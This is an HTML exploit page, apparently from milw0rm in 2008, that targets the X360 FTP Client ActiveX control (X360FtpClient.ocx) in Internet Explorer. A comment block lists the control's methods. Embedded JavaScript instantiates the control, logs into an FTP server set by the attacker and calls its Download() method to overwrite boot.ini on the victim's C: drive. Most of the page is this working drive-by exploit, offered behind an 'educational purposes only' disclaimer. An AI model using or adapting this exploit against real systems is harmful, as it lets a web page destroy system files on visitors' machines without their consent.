<HTML>

<!--

	- X360 FTP Cleint (X360FtpClient.ocx) Remote File Download/Overwrite -
	
		Author: t0pP8uZz
		Homepage: h4ck-y0u.org / milw0rm.com / Ciphercrew
		Description: ActiveX Remote Insecure Methods, Arbitrary File Overwrite Vulnerability.
		
		Report: Tested on Microsoft Windows XP Pro (SP2 ) Internet Explorer 6 Fully Patched
		
		ActiveX: http://www.x360soft.com/ftp-activex-ocx/x360-ftp-activex-ocx.html
	
		The Following Material Is For Educational Purposes Only - I will not be held responsable for any illegal actions.
	
		InternetExplorer can Initialise this ActiveX control, And take advantage of its functions.
		Included in this exploit (POC) is a peice of javascript code lauching the ActiveX control, and executing the "Download()" Method, this allows system files to be overwritten.
		
		- X360FtpClient.ocx Information -
			
			Interface _DX360FtpClient : IDispatch
			
			Default Interface: True
			Members : 35
			
			XPassword
			XPortNo
			XServerName
			XUserName
			XLicenseKey
			XTransferType
			DeleteFolder
			CreateFolder
			GetFileName
			GetFileType
			GetFileSize
			SetRemoteFolder
			DeleteFile
			Download
			Upload
			RenameFile
			RenameFolder
			FindFile
			
		__EOF__
		
	Peace, t0pP8uZz

-->

<OBJECT ID="x360" CLASSID="CLSID:65DAE962-97DC-49EF-8591-CB5CFDEE3554">Could Not Load ActiveX Control.</OBJECT>
<script language="javascript">
/* - X360 FTP Cleint (X360FtpClient.ocx) Remote File Download/Overwrite - */
/*                                           Javascript Code By t0pP8uZz                                  */

//Description: the below code will overwrite boot.ini on a windows machine. if the correct ftp details are given, and a blank boot.ini is hosted remotely.

x360.XServerName   = "127.0.0.1"; // your ftp server
x360.XUserName     = "username";       // server username
x360.XPassword     = "password";     // server password
x360.XTransferType = 0;

remoteFile = "/public_html/boot.init"; // path to remote file to download and replace locally, file name MUST be the same on the FTP , has the file you wish to overwrite locally.
localFile  = "C:/"; // directory which to place the downloaded file in, no filename, has the activex uses the remote filename.

if( (x360.Login() == 0) )
	x360.Download(remoteFile, localFile);
// else fail

</script>
</HTML>

# milw0rm.com [2008-05-09]